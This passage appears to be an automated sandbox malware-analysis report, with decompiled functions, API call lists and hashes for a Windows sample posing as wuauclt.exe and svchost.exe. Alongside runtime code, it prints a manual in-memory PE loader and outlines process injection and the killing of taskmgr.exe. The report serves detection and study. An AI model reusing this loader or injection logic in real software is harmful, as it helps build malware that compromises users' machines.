                                                						L25:
                                                						E0025FAB9( &_v36);
                                                						_t91 = _t200;
                                                						goto L26;
                                                					}
                                                				} else {
                                                					_t148 = E0025D495();
                                                					_t219 = 0x16;
                                                					 *_t148 = _t219;
                                                					E0025BA52();
                                                					_t91 = _t219;
                                                					L26:
                                                					return _t91;
                                                				}
                                                				L68:
                                                			}


                                                APIs
                                                • _free.LIBCMT ref: 0025F87B
                                                  • Part of subcall function 0025BA7F: IsProcessorFeaturePresent.KERNEL32(00000017,0025BA51,00000016,0025D38C,0000002C,0026FBC8,00261574,?,?,?,0025BA5E,00000000,00000000,00000000,00000000,00000000), ref: 0025BA81
                                                  • Part of subcall function 0025BA7F: GetCurrentProcess.KERNEL32(C0000417,0025D38C,00000016,0025E9E9), ref: 0025BAA3
                                                  • Part of subcall function 0025BA7F: TerminateProcess.KERNEL32(00000000), ref: 0025BAAA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                • String ID: *?$.
                                                • API String ID: 2667617558-3972193922
                                                • Opcode ID: a9fdad73963641235026ba844b344ef56bcf6c357ac4210e1c0350d6e0d593ca
                                                • Instruction ID: 22b80e6c1f0cec415b618d8e165e03e7012aad0520ae0ca6025899d7f68aaea3
                                                • Opcode Fuzzy Hash: a9fdad73963641235026ba844b344ef56bcf6c357ac4210e1c0350d6e0d593ca
                                                • Instruction Fuzzy Hash: 3751DE71E1020AAFDF14DFA8C981AADFBB5EF48311F24817AE854E7340E731AE158B54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 92%
                                                			E0025FF7E(signed int __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, char _a8) {
                                                				char _v8;
                                                				char _v16;
                                                				void* __ebp;
                                                				char _t31;
                                                				char _t40;
                                                				intOrPtr _t44;
                                                				char _t45;
                                                				signed int _t51;
                                                				void* _t64;
                                                				void* _t70;
                                                				signed int _t75;
                                                				void* _t81;
                                                
                                                				_t81 = __eflags;
                                                				_v8 = E0025E966(__ebx, __ecx, __edx);
                                                				E0026009D(__ebx, __ecx, __edx, __edi);
                                                				_t31 = E0025FD12(_t81, _a4);
                                                				_v16 = _t31;
                                                				_t57 =  *(_v8 + 0x48);
                                                				if(_t31 ==  *((intOrPtr*)( *(_v8 + 0x48) + 4))) {
                                                					return 0;
                                                				}
                                                				_push(__ebx);
                                                				_push(__edi);
                                                				_t70 = E0025D32E(_t57, 0x220);
                                                				_t51 = __ebx | 0xffffffff;
                                                				__eflags = _t70;
                                                				if(__eflags == 0) {
                                                					L5:
                                                					_t75 = _t51;
                                                					goto L6;
                                                				} else {
                                                					_t70 = memcpy(_t70,  *(_v8 + 0x48), 0x88 << 2);
                                                					 *_t70 =  *_t70 & 0x00000000;
                                                					_t75 = E0026013F(_t51, _t70, __eflags, _v16, _t70);
                                                					__eflags = _t75 - _t51;
                                                					if(_t75 != _t51) {
                                                						__eflags = _a8;
                                                						if(_a8 == 0) {
                                                							E0025CAF0();
                                                						}
                                                						asm("lock xadd [eax], ebx");
                                                						__eflags = _t51 == 1;
                                                						if(_t51 == 1) {
                                                							_t45 = _v8;
                                                							__eflags =  *((intOrPtr*)(_t45 + 0x48)) - 0x2728e8;
                                                							if( *((intOrPtr*)(_t45 + 0x48)) != 0x2728e8) {
                                                								E0025D2F4( *((intOrPtr*)(_t45 + 0x48)));
                                                							}
                                                						}
                                                						 *_t70 = 1;
                                                						_t64 = _t70;
                                                						_t70 = 0;
                                                						 *(_v8 + 0x48) = _t64;
                                                						_t40 = _v8;
                                                						__eflags =  *(_t40 + 0x350) & 0x00000002;
                                                						if(( *(_t40 + 0x350) & 0x00000002) == 0) {
                                                							__eflags =  *0x272b68 & 0x00000001;
                                                							if(( *0x272b68 & 0x00000001) == 0) {
                                                								_v16 =  &_v8;
                                                								E0025FBE8(5,  &_v16);
                                                								__eflags = _a8;
                                                								if(_a8 != 0) {
                                                									_t44 =  *0x272b08; // 0x14c9348
                                                									 *0x2725e4 = _t44;
                                                								}
                                                							}
                                                						}
                                                						L6:
                                                						E0025D2F4(_t70);
                                                						return _t75;
                                                					} else {
                                                						 *((intOrPtr*)(E0025D495())) = 0x16;
                                                						goto L5;
                                                					}
                                                				}
                                                			}
















                                                APIs
                                                  • Part of subcall function 0025E966: GetLastError.KERNEL32(?,?,0025A9FA,?,?,?,0025A5BB,?), ref: 0025E96A
                                                  • Part of subcall function 0025E966: _free.LIBCMT ref: 0025E99D
                                                  • Part of subcall function 0025E966: SetLastError.KERNEL32(00000000), ref: 0025E9DE
                                                  • Part of subcall function 0025E966: _abort.LIBCMT ref: 0025E9E4
                                                  • Part of subcall function 0026009D: _abort.LIBCMT ref: 002600CF
                                                  • Part of subcall function 0026009D: _free.LIBCMT ref: 00260103
                                                  • Part of subcall function 0025FD12: GetOEMCP.KERNEL32(00000000,?,?,0025FF9B,?), ref: 0025FD3D
                                                • _free.LIBCMT ref: 0025FFF6
                                                • _free.LIBCMT ref: 0026002C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: _free$ErrorLast_abort
                                                • String ID: ('
                                                • API String ID: 2991157371-476483421
                                                • Opcode ID: 846f7f03ca7f458dd2d30dfa1fc694e7eddc6a1a66a72961e3ac66b9c00d4878
                                                • Instruction ID: 2b8c9430732e2c685f8283233cfe7b50a9cd480012c8577af6ba6fd382947b66
                                                • Opcode Fuzzy Hash: 846f7f03ca7f458dd2d30dfa1fc694e7eddc6a1a66a72961e3ac66b9c00d4878
                                                • Instruction Fuzzy Hash: 4D313831914249EFDB20DF68D581B9EB7F0EF01321F2500A9EC049B291EB729DA8DF44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 46%
                                                			E00257097(void* __ecx, void* __esi, intOrPtr _a4) {
                                                				void* __ebp;
                                                				void* _t4;
                                                				void* _t5;
                                                				void* _t8;
                                                				void* _t9;
                                                				void* _t10;
                                                				void* _t11;
                                                
                                                				_t9 = __ecx;
                                                				asm("repne jnz 0x5");
                                                				asm("repne ret");
                                                				asm("repne jmp 0x74");
                                                				while(1) {
                                                					_push(_a4);
                                                					_t4 = E0025B87D(_t9);
                                                					_pop(_t10);
                                                					if(_t4 != 0) {
                                                						break;
                                                					}
                                                					_t5 = E0025BEAE(_t8, _t10, _t11, __eflags, _a4);
                                                					_pop(_t9);
                                                					__eflags = _t5;
                                                					if(_t5 == 0) {
                                                						__eflags = _a4 - 0xffffffff;
                                                						if(__eflags != 0) {
                                                							E00257EA5(__eflags);
                                                						} else {
                                                							E002575CF(__eflags);
                                                						}
                                                					}
                                                				}
                                                				return _t4;
                                                			}











                                                APIs
                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00257121
                                                • ___raise_securityfailure.LIBCMT ref: 00257208
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: FeaturePresentProcessor___raise_securityfailure
                                                • String ID: 5'
                                                • API String ID: 3761405300-3224889391
                                                • Opcode ID: 57e3100963a4b38fdef7b76c59736bfb6a1c17e87e280c50a31b688f28dbaea2
                                                • Instruction ID: fa1a1ca1ce6cb3e6ea8e79c39b571b20aa17231466cf27f7ffe314091411ebe2
                                                • Opcode Fuzzy Hash: 57e3100963a4b38fdef7b76c59736bfb6a1c17e87e280c50a31b688f28dbaea2
                                                • Instruction Fuzzy Hash: F52102B4951200AAD710DF19FD8AA417BE8FB1C710F50812AE90CCB3A0E3B09AD4EF4D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 69%
                                                			E0026009D(void* __ebx, void* __ecx, void* __edx, void* __edi) {
                                                				signed int _t15;
                                                				intOrPtr _t20;
                                                				void* _t24;
                                                				signed int _t25;
                                                				void* _t28;
                                                				intOrPtr _t29;
                                                				void* _t30;
                                                				void* _t34;
                                                
                                                				_t26 = __edx;
                                                				_t24 = __ecx;
                                                				_t23 = __ebx;
                                                				E00257B60(__ebx, __edi, 0x26fb48, 0xc);
                                                				_t29 = 0;
                                                				 *((intOrPtr*)(_t30 - 0x1c)) = 0;
                                                				_t28 = E0025E966(__ebx, _t24, __edx);
                                                				_t25 =  *0x272b68; // 0xfffffffe
                                                				if(( *(_t28 + 0x350) & _t25) == 0 ||  *((intOrPtr*)(_t28 + 0x4c)) == 0) {
                                                					L5:
                                                					_t15 = E0025F698(5);
                                                					_pop(_t25);
                                                					 *((intOrPtr*)(_t30 - 4)) = _t29;
                                                					_t29 =  *((intOrPtr*)(_t28 + 0x48));
                                                					 *((intOrPtr*)(_t30 - 0x1c)) = _t29;
                                                					_t34 = _t29 -  *0x272b08; // 0x14c9348
                                                					if(_t34 != 0) {
                                                						if(_t29 != 0) {
                                                							asm("lock xadd [esi], eax");
                                                							if((_t15 | 0xffffffff) == 0 && _t29 != 0x2728e8) {
                                                								E0025D2F4(_t29);
                                                								_pop(_t25);
                                                							}
                                                						}
                                                						_t20 =  *0x272b08; // 0x14c9348
                                                						 *((intOrPtr*)(_t28 + 0x48)) = _t20;
                                                						_t29 =  *0x272b08; // 0x14c9348
                                                						 *((intOrPtr*)(_t30 - 0x1c)) = _t29;
                                                						asm("lock inc dword [esi]");
                                                					}
                                                					 *((intOrPtr*)(_t30 - 4)) = 0xfffffffe;
                                                					E0026012E();
                                                					goto L3;
                                                				} else {
                                                					_t29 =  *((intOrPtr*)(_t28 + 0x48));
                                                					L3:
                                                					if(_t29 != 0) {
                                                						return E00257BA6();
                                                					}
                                                					E0025D37C(_t23, _t25, _t26, _t28, _t29);
                                                					goto L5;
                                                				}
                                                			}












                                                APIs
                                                  • Part of subcall function 0025E966: GetLastError.KERNEL32(?,?,0025A9FA,?,?,?,0025A5BB,?), ref: 0025E96A
                                                  • Part of subcall function 0025E966: _free.LIBCMT ref: 0025E99D
                                                  • Part of subcall function 0025E966: SetLastError.KERNEL32(00000000), ref: 0025E9DE
                                                  • Part of subcall function 0025E966: _abort.LIBCMT ref: 0025E9E4
                                                • _abort.LIBCMT ref: 002600CF
                                                • _free.LIBCMT ref: 00260103
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: ErrorLast_abort_free
                                                • String ID: ('
                                                • API String ID: 289325740-476483421
                                                • Opcode ID: 02f122a3a036fddc83a0b979172a52fd1f2dc693ca821adbbb2f0915cf76f2e0
                                                • Instruction ID: ab0bafc6908098eba451f4f354e158d3a34bc86097ba633ef42257825d7ee462
                                                • Opcode Fuzzy Hash: 02f122a3a036fddc83a0b979172a52fd1f2dc693ca821adbbb2f0915cf76f2e0
                                                • Instruction Fuzzy Hash: B301D231C21A26DBCB31AF289481B1EB360FF04B21F05014AE99873291CB306EE5DFC5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 92%
                                                			E0025C49E(void* __ebx, void* __ecx) {
                                                				intOrPtr _t3;
                                                				signed int _t15;
                                                				signed int _t16;
                                                
                                                				if( *0x273a60 == 0) {
                                                					_push(_t15);
                                                					E0026007F(__ecx);
                                                					_t19 = E00260459();
                                                					if(_t2 != 0) {
                                                						_t3 = E0025C4F7(__ebx, _t19);
                                                						if(_t3 != 0) {
                                                							 *0x273a6c = _t3;
                                                							E0026142B(0x273a60, _t3);
                                                							_t16 = 0;
                                                						} else {
                                                							_t16 = _t15 | 0xffffffff;
                                                						}
                                                						E0025D2F4(0);
                                                					} else {
                                                						_t16 = _t15 | 0xffffffff;
                                                					}
                                                					E0025D2F4(_t19);
                                                					return _t16;
                                                				} else {
                                                					return 0;
                                                				}
                                                			}







                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: _free
                                                • String ID: `:'
                                                • API String ID: 269201875-926251296
                                                • Opcode ID: 0141a83a9818d3058b96f7be9cc062bdd0ffa3bb889ea24b56657153b0441b55
                                                • Instruction ID: f622a530fe64ab34a9344dd8e3212560618477ff3e7531991f1cae6ec8287d69
                                                • Opcode Fuzzy Hash: 0141a83a9818d3058b96f7be9cc062bdd0ffa3bb889ea24b56657153b0441b55
                                                • Instruction Fuzzy Hash: B6E0EC52575611499271723E7C26B7B01455BC1333F214325FC24C61D1EF7489FAA85A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:4.1%
                                                Dynamic/Decrypted Code Coverage:16.7%
                                                Signature Coverage:3.3%
                                                Total number of Nodes:240
                                                Total number of Limit Nodes:11

                                                Control-flow Graph

                                                APIs
                                                • Sleep.KERNELBASE(000007D0), ref: 03997CC8
                                                • DeleteFileA.KERNELBASE(C:\Windows\system32\dllhostex.exe), ref: 03997CCF
                                                • GetVersionExA.KERNEL32(0000009C), ref: 03997CF6
                                                  • Part of subcall function 03991630: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03991666
                                                • Sleep.KERNEL32(00007530), ref: 03997D3F
                                                • Sleep.KERNEL32(00007530), ref: 03997D55
                                                • Sleep.KERNEL32(000001F4), ref: 03997D5C
                                                • WaitForSingleObject.KERNEL32(00000000,0000012C), ref: 03997D67
                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 03997D81
                                                • TerminateThread.KERNEL32(?,00000000), ref: 03997D8C
                                                • Sleep.KERNEL32(000003E8), ref: 03997DA4
                                                • DeleteFileA.KERNEL32(C:\Windows\system32\dllhostex.exe), ref: 03997DB4
                                                • Sleep.KERNEL32(00003A98), ref: 03997DC6
                                                • Sleep.KERNELBASE(000001F4), ref: 03997DCD
                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 03997DDC
                                                • TerminateThread.KERNEL32(?,00000000), ref: 03997DE7
                                                • Sleep.KERNEL32(00000BB8), ref: 03997E01
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep$Terminate$DeleteFileProcessThread$CreateObjectSingleSnapshotToolhelp32VersionWait
                                                • String ID: C:\Windows\system32\dllhostex.exe$\windows\system32\taskmgr.exe$\windows\syswow64\taskmgr.exe
                                                • API String ID: 3800454311-1893022162
                                                • Opcode ID: be05559b1c67b5b0c883da04f4632576a4da7908668ab0cbbcb737a099cdd645
                                                • Instruction ID: d4bf2174ba8b946d2ecf355580d8d8e509334e26e916affe46193fe083580c78
                                                • Opcode Fuzzy Hash: be05559b1c67b5b0c883da04f4632576a4da7908668ab0cbbcb737a099cdd645
                                                • Instruction Fuzzy Hash: 72315D325A8310ABFF21F7A59D09F6E7AA89F45B80F190815E6846E1C2DFB54404CBD2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03991666
                                                • Process32First.KERNEL32(00000000,?), ref: 0399169D
                                                • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 039916D3
                                                • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 039916F2
                                                • CloseHandle.KERNEL32(00000000), ref: 039917A3
                                                • Process32Next.KERNEL32(00000000,00000128), ref: 039917B1
                                                • CloseHandle.KERNEL32(00000000), ref: 039917C4
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseHandleProcess32$CreateFileFirstModuleNameNextOpenProcessSnapshotToolhelp32
                                                • String ID:
                                                • API String ID: 1963419105-0
                                                • Opcode ID: 0edaf6b30032f87105100780591b08e5448ae00d5f543be2ce02ae3bce6a2121
                                                • Instruction ID: 8cc81777d5284a28084c4e6a447d10983dacf21ab118f3f57a20184f666c97a4
                                                • Opcode Fuzzy Hash: 0edaf6b30032f87105100780591b08e5448ae00d5f543be2ce02ae3bce6a2121
                                                • Instruction Fuzzy Hash: 9741BA7590021A9BEF10DF68DC45BEAB77DFF85340F0841D5E90997181EA715A45CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,00000000,?,00003000,00000040,00000000,?,?), ref: 03997283
                                                  • Part of subcall function 039967D0: IsBadHugeReadPtr.KERNEL32(00000000,00000040), ref: 039967E3
                                                  • Part of subcall function 039967D0: IsBadHugeReadPtr.KERNEL32(00000000,000000F8), ref: 03996809
                                                  • Part of subcall function 03996710: IsBadHugeReadPtr.KERNEL32(00000000,00000040), ref: 0399672B
                                                  • Part of subcall function 03996710: IsBadHugeReadPtr.KERNEL32(00005A4D,000000F8), ref: 03996749
                                                  • Part of subcall function 03996710: IsBadHugeReadPtr.KERNEL32(00005A4D,000000F8), ref: 0399675D
                                                  • Part of subcall function 03996710: IsBadHugeReadPtr.KERNEL32(00000000,00000040), ref: 0399677E
                                                  • Part of subcall function 03996710: IsBadHugeReadPtr.KERNEL32(00000000,000000F8), ref: 039967A0
                                                • WriteProcessMemory.KERNELBASE(?,00000000,00000000,?,00000000), ref: 0399731D
                                                • ResumeThread.KERNELBASE(?), ref: 03997358
                                                Strings
                                                • Could not relocate the module!, xrefs: 039972DD
                                                • Redirecting failed!, xrefs: 0399733F
                                                • Could not allocate memory in the remote process, xrefs: 0399728F
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: HugeRead$AllocMemoryProcessResumeThreadVirtualWrite
                                                • String ID: Could not allocate memory in the remote process$Could not relocate the module!$Redirecting failed!
                                                • API String ID: 1187666436-1687977203
                                                • Opcode ID: 41ab4c00a63c1b518c4dee2d72a517f9b64454cb86f8396a936566697486e3f1
                                                • Instruction ID: da2c0bf361a767898cbe0631536b4e530b4cfd67f11af7488dcdf348f2fd85a8
                                                • Opcode Fuzzy Hash: 41ab4c00a63c1b518c4dee2d72a517f9b64454cb86f8396a936566697486e3f1
                                                • Instruction Fuzzy Hash: BC31D679F102147BEF10EAEDAC41AFEB77DEB88651F1400A7F908A7241EE32591096A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000050,?,?,?,?,?,?,?,?,?,73B76490), ref: 6FD53E05
                                                • CryptImportKey.ADVAPI32(00000000,6FD69B90,00000094,00000000,00000000,?,?,?,?,?,?,?,?,73B76490), ref: 6FD53E2A
                                                • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,?,?,?,?,?,?,?,?,73B76490), ref: 6FD53E44
                                                • CryptHashData.ADVAPI32(00000000,?,?,00000000,?,?,?,?,?,?,?,73B76490), ref: 6FD53E59
                                                • CryptVerifySignatureW.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,73B76490), ref: 6FD53E76
                                                • CryptDestroyHash.ADVAPI32(?,?,?,?,?,?,?,?,73B76490,?,?,?,?,6FD54903), ref: 6FD53E91
                                                • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,73B76490,?,?,?,?,6FD54903), ref: 6FD53EA1
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyImportReleaseSignatureVerify
                                                • String ID:
                                                • API String ID: 949692108-0
                                                • Opcode ID: a98c653c8afef73438f9594a89fd32c21763e875d3575403d3ecd9832326527f
                                                • Instruction ID: 87b4881cb6b39c5787af5937b33f956f2345c41b7d85196db6136fa895bbc514
                                                • Opcode Fuzzy Hash: a98c653c8afef73438f9594a89fd32c21763e875d3575403d3ecd9832326527f
                                                • Instruction Fuzzy Hash: FE210735B80309BBFF208FA0DD46FEA7BB9AB05B51F140155BA04E51D0D672BA34AA64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E6FD54D40(intOrPtr* __ecx) {
                                                				void* _v8;
                                                				intOrPtr _v12;
                                                				intOrPtr* _v16;
                                                				long _v20;
                                                				intOrPtr* _v24;
                                                				void* _t58;
                                                				struct HINSTANCE__* _t69;
                                                				CHAR* _t70;
                                                				_Unknown_base(*)()* _t71;
                                                				intOrPtr* _t77;
                                                				signed int _t78;
                                                				unsigned int _t79;
                                                				void* _t85;
                                                				void* _t86;
                                                				intOrPtr* _t89;
                                                				struct HINSTANCE__* _t90;
                                                				void* _t91;
                                                				intOrPtr _t97;
                                                				signed int _t98;
                                                				void* _t100;
                                                				void* _t101;
                                                				signed short _t102;
                                                				signed int _t104;
                                                				intOrPtr* _t106;
                                                				intOrPtr _t108;
                                                				_Unknown_base(*)()** _t110;
                                                				void* _t111;
                                                				intOrPtr* _t112;
                                                				intOrPtr* _t113;
                                                				signed short* _t115;
                                                				signed int _t118;
                                                				intOrPtr _t119;
                                                				signed short _t137;
                                                
                                                				_t113 =  *((intOrPtr*)(__ecx + 4));
                                                				_v24 = __ecx;
                                                				_v16 = _t113;
                                                				_t108 = _t113 + 4 +  *((intOrPtr*)(_t113 + 0x3c));
                                                				_v12 = _t108;
                                                				_t58 = VirtualAlloc(0,  *(_t108 + 0x4c), 0x3000, 0x40); // executed
                                                				_t101 = _t58;
                                                				_v8 = _t101;
                                                				if(_t101 != 0) {
                                                					_t85 = 0;
                                                					if(0 >=  *((intOrPtr*)(_t108 + 2))) {
                                                						L7:
                                                						if( *((intOrPtr*)(_t108 + 0xa0)) == 0) {
                                                							L18:
                                                							if( *((intOrPtr*)(_t108 + 0x80)) == 0) {
                                                								L33:
                                                								_t86 = _v8;
                                                								_v20 = 0;
                                                								VirtualProtect(_t86,  *(_t108 + 0x4c), 0x40,  &_v20); // executed
                                                								 *((intOrPtr*)( *((intOrPtr*)(_t108 + 0x24)) + _t86))(0, 1,  *_v24); // executed
                                                								L34:
                                                								return 0;
                                                							}
                                                							_t89 =  *((intOrPtr*)(_t108 + 0x7c)) + _t101;
                                                							_v16 = _t89;
                                                							if( *_t89 == 0) {
                                                								goto L33;
                                                							}
                                                							while(1) {
                                                								_t69 = LoadLibraryA( *((intOrPtr*)(_t89 + 0xc)) + _t101); // executed
                                                								_v20 = _t69;
                                                								if(_t69 == 0) {
                                                									goto L34;
                                                								}
                                                								_t115 =  *_t89 + _v8;
                                                								_t110 =  *((intOrPtr*)(_t89 + 0x10)) + _v8;
                                                								_t102 =  *_t115;
                                                								_t137 = _t102;
                                                								if(_t137 == 0) {
                                                									L31:
                                                									_t89 = _t89 + 0x14;
                                                									_v16 = _t89;
                                                									if( *_t89 != 0) {
                                                										_t101 = _v8;
                                                										continue;
                                                									}
                                                									_t108 = _v12;
                                                									goto L33;
                                                								}
                                                								_t90 = _t69;
                                                								do {
                                                									if(_t137 < 0 || 0 != 0) {
                                                										_t70 = _t102 & 0x0000ffff;
                                                									} else {
                                                										_t70 = _v8 + 2 + _t102;
                                                									}
                                                									_t71 = GetProcAddress(_t90, _t70);
                                                									_t115 =  &(_t115[2]);
                                                									 *_t110 = _t71;
                                                									_t110 = _t110 + 4;
                                                									_t102 =  *_t115;
                                                								} while (_t102 != 0);
                                                								_t89 = _v16;
                                                								goto L31;
                                                							}
                                                							goto L34;
                                                						}
                                                						_t77 =  *((intOrPtr*)(_t108 + 0x9c)) + _t101;
                                                						_v16 = _t101 -  *((intOrPtr*)(_t108 + 0x30));
                                                						_t97 =  *_t77;
                                                						if(_t97 == 0) {
                                                							goto L18;
                                                						} else {
                                                							goto L9;
                                                						}
                                                						do {
                                                							L9:
                                                							_t111 = _t97 + _t101;
                                                							_t91 = _t77 + 8;
                                                							_t118 =  *((intOrPtr*)(_t77 + 4)) - 8 >> 1;
                                                							_t98 = 0;
                                                							if(_t118 == 0) {
                                                								goto L16;
                                                							}
                                                							do {
                                                								_t78 =  *(_t91 + _t98 * 2) & 0x0000ffff;
                                                								_t79 = _t78 >> 0xc;
                                                								_t104 = _t78 & 0x00000fff;
                                                								if(_t79 == 3 || _t79 == 0xa) {
                                                									 *((intOrPtr*)(_t104 + _t111)) =  *((intOrPtr*)(_t104 + _t111)) + _v16;
                                                								}
                                                								_t98 = _t98 + 1;
                                                							} while (_t98 < _t118);
                                                							_t101 = _v8;
                                                							L16:
                                                							_t97 =  *((intOrPtr*)(_t91 + _t118 * 2));
                                                							_t77 = _t91 + _t118 * 2;
                                                						} while (_t97 != 0);
                                                						_t108 = _v12;
                                                						goto L18;
                                                					}
                                                					_t112 = _t108 + 0x108;
                                                					do {
                                                						_t100 =  *((intOrPtr*)(_t112 - 8)) + _t101;
                                                						_t106 =  *_t112 + _t113;
                                                						_t119 =  *((intOrPtr*)(_t112 - 4));
                                                						if(_t119 == 0) {
                                                							goto L5;
                                                						} else {
                                                							goto L4;
                                                						}
                                                						do {
                                                							L4:
                                                							_t100 = _t100 + 1;
                                                							 *((char*)(_t100 - 1)) =  *_t106;
                                                							_t106 = _t106 + 1;
                                                							_t119 = _t119 - 1;
                                                						} while (_t119 != 0);
                                                						L5:
                                                						_t85 = _t85 + 1;
                                                						_t101 = _v8;
                                                						_t112 = _t112 + 0x28;
                                                						_t113 = _v16;
                                                					} while (_t85 < ( *(_v12 + 2) & 0x0000ffff));
                                                					_t108 = _v12;
                                                					goto L7;
                                                				}
                                                				return 0;
                                                			}


                                                APIs
                                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 6FD54D68
                                                • LoadLibraryA.KERNELBASE(?), ref: 6FD54E59
                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 6FD54E9C
                                                • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 6FD54ED5
                                                Memory Dump Source
